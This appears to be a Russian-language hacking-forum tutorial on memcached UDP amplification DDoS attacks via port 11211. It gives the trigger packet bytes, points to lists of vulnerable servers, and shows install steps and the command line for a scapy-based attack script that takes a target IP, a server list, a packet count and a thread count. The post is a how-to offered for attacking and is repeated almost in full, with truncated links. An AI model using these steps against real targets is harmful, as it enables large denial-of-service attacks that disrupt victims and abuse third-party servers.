Расскажу немного про эту уязвимость и покажу как пользоваться.
Для этого нам понадобится наш любимый Linux. Я юзаю Kali, но вообщем это роли не играет.
Немного предыстории:
Недавно обнаружили новую уязвимость, которая позволяет усиливать атаки. Для того, чтобы совершить атаку достаточно знать ip адреса уязвимых серверов c открытым портом 11211. Таких адресов около 17 тыс. На порт уязвимого сервера отправляется пакет:
Код:
\x00\x00\x00\x00\x00\x01\x00\x00stats\r\n
После обработки пакета сервер отвечает большим пакетом до 1mb. Это позволило совершить атаку в 1,3 ТБ/с. Github не справился с атакой, иностранный провайдер тоже, а ведь чтобы запустить такую атаку нужно всего-то пару минут.
Нусс приступим...
Для начало нам нужно найти сервера, для этого мы воспользуемся Для просмотра ссылки Войдиили Зарегистрируйся .
Или воспользуемся уже готовым списком, который собрали до нас - Для просмотра ссылки Войдиили Зарегистрируйся . Скрипт для атаки написан на python 2.7.
Код:
sudo apt-get install python
Потом устанавливаем нужные библиотеки...
Код:
python -m pip install datetime
python -m pip install scapy
Запускаем программу...
Код:
python namescript.py -T xx.xx.xx.xx -S file.txt -P 100 -Thread 100
T - Цель
S - Файл с уязвимыми серверами
P - Кол-во отправленных пакетов
Thread - Потоки
Ссылка на программу - Для просмотра ссылки Войдиили Зарегистрируйся
А также исходники атаки: Для просмотра ссылки Войдиили Зарегистрируйся
Полезный сканер для поиска: Для просмотра ссылки Войдиили Зарегистрируйся
Для этого нам понадобится наш любимый Linux. Я юзаю Kali, но вообщем это роли не играет.
Немного предыстории:
Недавно обнаружили новую уязвимость, которая позволяет усиливать атаки. Для того, чтобы совершить атаку достаточно знать ip адреса уязвимых серверов c открытым портом 11211. Таких адресов около 17 тыс. На порт уязвимого сервера отправляется пакет:
Код:
\x00\x00\x00\x00\x00\x01\x00\x00stats\r\n
После обработки пакета сервер отвечает большим пакетом до 1mb. Это позволило совершить атаку в 1,3 ТБ/с. Github не справился с атакой, иностранный провайдер тоже, а ведь чтобы запустить такую атаку нужно всего-то пару минут.
Нусс приступим...
Для начало нам нужно найти сервера, для этого мы воспользуемся Для просмотра ссылки Войди
Или воспользуемся уже готовым списком, который собрали до нас - Для просмотра ссылки Войди
Код:
sudo apt-get install python
Потом устанавливаем нужные библиотеки...
Код:
python -m pip install datetime
python -m pip install scapy
Запускаем программу...
Код:
python namescript.py -T xx.xx.xx.xx -S file.txt -P 100 -Thread 100
T - Цель
S - Файл с уязвимыми серверами
P - Кол-во отправленных пакетов
Thread - Потоки
Ссылка на программу - Для просмотра ссылки Войди
А также исходники атаки: Для просмотра ссылки Войди
Полезный сканер для поиска: Для просмотра ссылки Войди